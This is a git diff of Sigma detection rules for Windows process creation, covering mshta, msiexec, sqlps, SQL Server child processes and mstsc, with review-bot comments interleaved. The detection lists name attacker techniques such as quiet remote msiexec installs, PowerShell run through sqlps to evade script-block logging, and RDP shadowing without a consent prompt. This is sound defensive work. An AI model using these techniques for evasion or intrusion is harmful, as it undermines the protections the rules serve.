b2dbe9255..e2db5d102 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml @@ -1,8 +1,7 @@ title: MSHTA Suspicious Execution 01 id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3 status: test -description: Detection for mshta.exe suspicious execution patterns sometimes involving - file polyglotism +description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism references: - http://blog.sevagas.com/?Hacking-around-HTA-files - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356 
@@ -27,19 +26,20 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - vbscript
 - .jpg
 - .png
 - .lnk
+ # - '.chm' # could be prone to false positives
 - .xls
 - .doc
 - .zip
 - .dll
- NewProcessName|endswith: \mshta.exe
+ # - '.exe'
+ NewProcessName|endswith: \mshta.exe
 condition: process_creation and selection
 falsepositives:
- - False positives depend on scripts and administrative tools used in the monitored
- environment
+ - False positives depend on scripts and administrative tools used in the monitored environment
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml
index c3bf93514..61a2ec97a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml
@@ -20,10 +20,11 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \mshta.exe
- - OriginalFileName: MSHTA.EXE
+ - NewProcessName|endswith: \mshta.exe
+ - OriginalFileName: MSHTA.EXE
 selection_susp:
- CommandLine|contains:
+ # Suspicious parents
+ CommandLine|contains:
 - \AppData\Local\
 - C:\ProgramData\
 - C:\Users\Public\
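Review bot: The new commented-out `# - '.exe'` entry placed before `NewProcessName|endswith: \mshta.exe` gives no reason for being disabled, whereas the `# - '.chm'` entry added in the same hunk carries `# could be prone to false positives`. A dormant value in a detection list reads either as a TODO or as a deliberate exclusion and the reader cannot tell which; either drop it or give it the same trailing note style, e.g. `# - '.exe' # <reason it is excluded>`. The `detection:` block this selection belongs to starts before the hunk.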
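Review bot: The two comments added to `selection_susp` do not sit above the lists they name: `# Suspicious parents` is placed directly over the `CommandLine|contains:` folder list (`\AppData\Local\`, `C:\ProgramData\`, `C:\Users\Public\`), and in the next hunk of this file (`@@ -36,18 +37,21 @@`) `# Suspicious folders` lands after the `\regsvr32.exe`/`\rundll32.exe`/`\wscript.exe` parent-name list, immediately before `filter_img:`. The key heading that parent-name list lies between the two hunks, so this looks like a side effect of the conversion reordering keys while the comments kept their line positions, though I cannot confirm that from the diff. Either way the two labels should be swapped so each heads the list it describes (`# Suspicious folders` over `CommandLine|contains:`, `# Suspicious parents` over the parent list), and no label should be left dangling between the end of `selection_susp` and `filter_img:`.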
@@ -36,18 +37,21 @@ detection:
 - \regsvr32.exe
 - \rundll32.exe
 - \wscript.exe
+ # Suspicious folders
 filter_img:
- - NewProcessName|startswith:
- - C:\Windows\System32\
- - C:\Windows\SysWOW64\
- - CommandLine|contains:
- - .htm
- - .hta
- - CommandLine|endswith:
- - mshta.exe
- - mshta
- condition: process_creation and (all of selection_* or (selection_img and not
- filter_img))
+ # Filter legit Locations
+ - NewProcessName|startswith:
+ - C:\Windows\System32\
+ - C:\Windows\SysWOW64\
+ # Suspicious extensions
+ - CommandLine|contains:
+ - .htm
+ - .hta
+ # Filter simple execution
+ - CommandLine|endswith:
+ - mshta.exe
+ - mshta
+ condition: process_creation and (all of selection_* or (selection_img and not filter_img))
 falsepositives:
 - Unknown
 level: high
diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_dll.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_dll.yml
index c2bbc9fe9..007e47070 100644
--- a/sigma/builtin/process_creation/proc_creation_win_msiexec_dll.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_dll.yml
@@ -20,14 +20,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \msiexec.exe
- - OriginalFileName: \msiexec.exe
+ - NewProcessName|endswith: \msiexec.exe
+ - OriginalFileName: \msiexec.exe
 selection_flag:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /z '
 - ' -z '
 selection_dll:
- CommandLine|contains: .dll
+ CommandLine|contains: .dll
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_embedding.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_embedding.yml
index c1ac8c4fb..38413163f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_msiexec_embedding.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_embedding.yml
@@ -1,8 +1,7 @@ title: Suspicious MsiExec Embedding Parent id: 4a2a2c3e-209f-4d01-b513-4155a540b469 status: test -description: Adversaries may abuse msiexec.exe to proxy the execution of malicious - payloads +description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md author: frack113 @@ -22,18 +21,18 @@ detection: ParentCommandLine|contains|all: - MsiExec.exe - '-Embedding ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \cmd.exe filter_splunk_ufw: - CommandLine|contains: C:\Program Files\SplunkUniversalForwarder\bin\ - NewProcessName|endswith: :\Windows\System32\cmd.exe + CommandLine|contains: C:\Program Files\SplunkUniversalForwarder\bin\ + NewProcessName|endswith: :\Windows\System32\cmd.exe filter_vs: - - CommandLine|contains: \DismFoDInstall.cmd - - ParentCommandLine|contains|all: - - '\MsiExec.exe -Embedding ' - - Global\MSI0000 + - CommandLine|contains: \DismFoDInstall.cmd + - ParentCommandLine|contains|all: + - '\MsiExec.exe -Embedding ' + - Global\MSI0000 condition: process_creation and (selection and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml index 90e29a3e9..a7db7a8c5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml 
@@ -1,12 +1,9 @@ title: Suspicious Msiexec Execute Arbitrary DLL id: 6f4191bb-912b-48a8-9ce7-682769541e6d status: test -description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. - - Msiexec.exe is the command-line utility for the Windows Installer and is thus - commonly associated with executing installation packages (.msi) - - ' +description: | + Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. + Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md 
@@ -25,24 +22,24 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' /y' - ' -y' - NewProcessName|endswith: \msiexec.exe + NewProcessName|endswith: \msiexec.exe filter_apple: - CommandLine|contains: + CommandLine|contains: - \MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll - \MsiExec.exe" /Y "C:\Windows\CCM\ - - \MsiExec.exe" /Y C:\Windows\CCM\ + - \MsiExec.exe" /Y C:\Windows\CCM\ # also need non-quoted execution - \MsiExec.exe" -Y "C:\Program Files\Bonjour\mdnsNSP.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll - \MsiExec.exe" -Y "C:\Windows\CCM\ - - \MsiExec.exe" -Y C:\Windows\CCM\ + - \MsiExec.exe" -Y C:\Windows\CCM\ # also need non-quoted execution condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Legitimate script diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml index 4ddbd70f2..3f66e5ac7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml 
@@ -1,12 +1,9 @@ title: Msiexec Quiet Installation id: 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5 status: experimental -description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. - - Msiexec.exe is the command-line utility for the Windows Installer and is thus - commonly associated with executing installation packages (.msi) - - ' +description: | + Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. + Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md @@ -25,10 +22,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msiexec.exe - - OriginalFileName: msiexec.exe + - NewProcessName|endswith: \msiexec.exe + - OriginalFileName: msiexec.exe selection_cli: - CommandLine|contains: + # Note that there is no space before and after the arguments because it's possible to write a commandline as such + # Example: msiexec -q/i [MSI Package] + CommandLine|contains: - /i - -i - /package @@ -38,10 +37,11 @@ detection: - /j - -j selection_quiet: - CommandLine|contains: + CommandLine|contains: - /q - -q filter_user_temp: + # The %temp% is a very common location for installers ParentProcessName|startswith: C:\Users\ ParentProcessName|contains: \AppData\Local\Temp\ filter_system_temp: diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml index 9d1b32f9e..5abdbd715 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml 
@@ -1,8 +1,8 @@ title: Suspicious Msiexec Quiet Install From Remote Location id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c related: - - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f - type: similar + - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f + type: similar status: test description: Detects usage of Msiexec.exe to install packages hosted remotely quietly references: @@ -20,10 +20,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msiexec.exe - - OriginalFileName: msiexec.exe + - NewProcessName|endswith: \msiexec.exe + - OriginalFileName: msiexec.exe selection_cli: - CommandLine|contains: + # Note that there is no space before and after the arguments because it's possible to write a commandline as such + # Example: msiexec -q/i [MSI Package] + CommandLine|contains: - /i - -i - /package @@ -33,11 +35,11 @@ detection: - /j - -j selection_quiet: - CommandLine|contains: + CommandLine|contains: - /q - -q selection_remote: - CommandLine|contains: + CommandLine|contains: - http - \\\\ condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml index 803969747..0be6d877b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \msiexec.exe - - OriginalFileName: \msiexec.exe + - NewProcessName|endswith: \msiexec.exe + - OriginalFileName: \msiexec.exe filter: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Windows\System32\ - C:\Windows\SysWOW64\ - C:\Windows\WinSxS\ diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_web_install.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_web_install.yml index 2187a5e7c..5a88b7ee8 100644 
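Review bot: In the msiexec_masquerading hunk, `- OriginalFileName: \msiexec.exe` keeps a leading backslash while the neighbouring rules in this commit use `OriginalFileName: msiexec.exe`; OriginalFileName comes from the PE version resource and is a bare file name, so an exact match against `\msiexec.exe` cannot succeed and that branch of the selection is dead. The same leading backslash appears in the sqltoolsps rule further down (`- OriginalFileName: \sqltoolsps.exe`). If the intent is to match the original file name, the lines should read `- OriginalFileName: msiexec.exe` and `- OriginalFileName: sqltoolsps.exe`; if the Security 4688 events these builtin rules target carry no OriginalFileName field at all, as I believe, the branch is inert either way and a short comment saying so would spare the next reader the same question.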
--- a/sigma/builtin/process_creation/proc_creation_win_msiexec_web_install.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_web_install.yml @@ -1,8 +1,8 @@ title: MsiExec Web Install id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f related: - - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c - type: similar + - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c + type: similar status: test description: Detects suspicious msiexec process starts with web addresses as parameter references: @@ -23,12 +23,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' msiexec' - :// condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_msohtmed_download.yml b/sigma/builtin/process_creation/proc_creation_win_msohtmed_download.yml index 906199966..e5303b12c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msohtmed_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msohtmed_download.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \MSOHTMED.exe - - OriginalFileName: MsoHtmEd.exe + - NewProcessName|endswith: \MSOHTMED.exe + - OriginalFileName: MsoHtmEd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/builtin/process_creation/proc_creation_win_mspub_download.yml b/sigma/builtin/process_creation/proc_creation_win_mspub_download.yml index 292283e5d..2ac9c0c89 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mspub_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mspub_download.yml 
@@ -1,8 +1,7 @@ title: Arbitrary File Download Via MSPUB.EXE id: 3b3c7f55-f771-4dd6-8a6e-08d057a17caf status: test -description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary - files +description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \MSPUB.exe - - OriginalFileName: MSPUB.exe + - NewProcessName|endswith: \MSPUB.exe + - OriginalFileName: MSPUB.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml index e91f5b96b..2c88d172f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml 
@@ -1,14 +1,9 @@ title: Detection of PowerShell Execution via Sqlps.exe id: 0152550d-3a26-4efd-9f0e-54a0b28ae2f3 status: test -description: 'This rule detects execution of a PowerShell code through the sqlps.exe - utility, which is included in the standard set of utilities supplied with the - MSSQL Server. - - Script blocks are not logged in this case, so this utility helps to bypass protection - mechanisms based on the analysis of these logs. - - ' +description: | + This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. + Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. references: - https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/ @@ -31,14 +26,12 @@ detection: selection_parent: ParentProcessName|endswith: \sqlps.exe selection_image: - - NewProcessName|endswith: \sqlps.exe - - OriginalFileName: sqlps.exe + - NewProcessName|endswith: \sqlps.exe + - OriginalFileName: sqlps.exe filter_image: ParentProcessName|endswith: \sqlagent.exe - condition: process_creation and (selection_parent or (selection_image and not - filter_image)) + condition: process_creation and (selection_parent or (selection_image and not filter_image)) falsepositives: - - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe - spawned by sqlagent.exe is a legitimate action. + - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml index 710f68b70..8ce2bbe44 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml @@ -1,14 +1,9 @@ title: SQL Client Tools PowerShell Session Detection id: a746c9b8-a2fb-4ee5-a428-92bee9e99060 status: test -description: 'This rule detects execution of a PowerShell code through the sqltoolsps.exe - utility, which is included in the standard set of utilities supplied with the - Microsoft SQL Server Management studio. - - Script blocks are not logged in this case, so this utility helps to bypass protection - mechanisms based on the analysis of these logs. - - ' +description: | + This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. + Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. references: - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml - https://twitter.com/pabraeken/status/993298228840992768 @@ -28,14 +23,13 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \sqltoolsps.exe - - ParentProcessName|endswith: \sqltoolsps.exe - - OriginalFileName: \sqltoolsps.exe + - NewProcessName|endswith: \sqltoolsps.exe + - ParentProcessName|endswith: \sqltoolsps.exe + - OriginalFileName: \sqltoolsps.exe filter: ParentProcessName|endswith: \smss.exe condition: process_creation and (selection and not filter) falsepositives: - - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess - sqltoolsps.exe spawned by smss.exe is a legitimate action. + - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action. level: medium ruletype: Sigma 
diff --git a/sigma/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml index 53920eedb..416cdbb36 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of SQL Server id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 related: - - id: 344482e4-a477-436c-aa70-7536d18a48c7 - type: obsoletes + - id: 344482e4-a477-436c-aa70-7536d18a48c7 + type: obsoletes status: experimental -description: Detects suspicious child processes of the SQLServer process. This could - indicate potential RCE or SQL Injection. +description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. author: FPT.EagleEye Team, wagga date: 2020/12/11 modified: 2023/05/04 @@ -24,7 +23,8 @@ detection: Channel: Security selection: ParentProcessName|endswith: \sqlservr.exe - NewProcessName|endswith: + NewProcessName|endswith: + # You can add other uncommon or suspicious processes - \bash.exe - \bitsadmin.exe - \cmd.exe @@ -40,10 +40,10 @@ detection: - \tasklist.exe - \wsl.exe filter_optional_datev: - CommandLine|startswith: '"C:\Windows\system32\cmd.exe" ' + CommandLine|startswith: '"C:\Windows\system32\cmd.exe" ' ParentProcessName|startswith: C:\Program Files\Microsoft SQL Server\ ParentProcessName|endswith: DATEV_DBENGINE\MSSQL\Binn\sqlservr.exe - NewProcessName: C:\Windows\System32\cmd.exe + NewProcessName: C:\Windows\System32\cmd.exe condition: process_creation and (selection and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml index cde50bf23..2efdc8647 100644 
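Review bot: filter_optional_datev in the last hunk still has no comment explaining its scope, while the selection list above it gained one; as written it suppresses every `cmd.exe` child of the DATEV SQL Server instance, which would also hide a cmd.exe spawned through that instance after a compromise. The `filter_optional_` prefix signals the filter can be dropped, but that convention is easy to miss. I would add above it `# Excludes cmd.exe spawned by the DATEV SQL Server instance. This hides every cmd.exe child of that instance, so remove the filter if DATEV is not deployed in your environment.`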
--- a/sigma/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of Veeam Dabatase id: d55b793d-f847-4eea-b59a-5ab09908ac90 related: - - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 - type: similar + - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 + type: similar status: experimental -description: Detects suspicious child processes of the Veeam service process. This - could indicate potential RCE or SQL Injection. +description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) @@ -25,7 +24,7 @@ detection: ParentCommandLine|contains: VEEAMSQL ParentProcessName|endswith: \sqlservr.exe selection_child_1: - CommandLine|contains: + CommandLine|contains: - '-ex ' - bypass - cscript @@ -37,14 +36,14 @@ detection: - rundll32 - wscript - 'copy ' - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe - \wsl.exe - \wt.exe selection_child_2: - NewProcessName|endswith: + NewProcessName|endswith: - \net.exe - \net1.exe - \netstat.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml index bc95bbd94..57a5fd8eb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - noconsentprompt - 'shadow:' condition: process_creation and selection 
diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml index d2ae4c3a5..48b0ea37c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml @@ -1,13 +1,9 @@ title: New Remote Desktop Connection Initiated Via Mstsc.EXE id: 954f0af7-62dd-418f-b3df-a84bc2c7a774 status: test -description: 'Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection - to a remote server. - - Adversaries may use valid accounts to log into a computer using the Remote Desktop - Protocol (RDP). The adversary may then perform actions as the logged-on user. - - ' +description: | + Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. + Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc 
@@ -25,12 +21,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - NewProcessName|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_cli: - CommandLine|contains: ' /v:' + CommandLine|contains: ' /v:' filter_optional_wsl: - CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp + # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp + CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp ParentProcessName: C:\Windows\System32\lxss\wslhost.exe condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml index 98eb1dc88..cd34cc986 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml @@ -19,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - NewProcessName|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .rdp - .rdp" filter_optional_wsl: - CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp + CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp ParentProcessName: C:\Windows\System32\lxss\wslhost.exe condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: 
diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml index 5d2934e61..afb22e706 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml @@ -1,8 +1,7 @@ title: Suspicious Mstsc.EXE Execution With Local RDP File id: 6e22722b-dfb1-4508-a911-49ac840b40f8 status: experimental -description: Detects potential RDP connection via Mstsc using a local ".rdp" file - located in suspicious locations. +description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. references: - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ @@ -19,14 +18,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - NewProcessName|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_extension: - CommandLine|endswith: + CommandLine|endswith: - .rdp - .rdp" selection_paths: - CommandLine|contains: + # Note: This list of paths is better transformed into a whitelist where you only exclude legitimate locations you use in your env + CommandLine|contains: - :\Users\Public\ - :\Windows\System32\spool\drivers\color - ':\Windows\System32\Tasks_Migrated ' @@ -34,7 +34,8 @@ detection: - :\Windows\Temp\ - :\Windows\Tracing\ - \AppData\Local\Temp\ - - \Downloads\ + # - '\Desktop\' # Could be source of FP depending on the environment + - \Downloads\ # Could be source of FP depending on the environment condition: process_creation and (all of selection_*) falsepositives: - Likelihood is related to how often the paths are used in the environment 
diff --git a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml index 56712baa0..965ee4aba 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml @@ -1,8 +1,7 @@ title: Mstsc.EXE Execution From Uncommon Parent id: ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6 status: experimental -description: Detects potential RDP connection via Mstsc using a local ".rdp" file - located in suspicious locations. +description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. references: - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ @@ -20,6 +19,7 @@ detection: Channel: Security selection_parent: ParentProcessName|endswith: + # Covers potential downloads/clicks from browsers - \brave.exe - \CCleanerBrowser.exe - \chrome.exe @@ -31,10 +31,11 @@ detection: - \opera.exe - \vivaldi.exe - \whale.exe + # Covers potential downloads/clicks from email clients - \outlook.exe selection_img: - - NewProcessName|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - NewProcessName|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_msxsl_execution.yml b/sigma/builtin/process_creation/proc_creation_win_msxsl_execution.yml index 84e98dff0..88af0ba36 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msxsl_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msxsl_execution.yml 
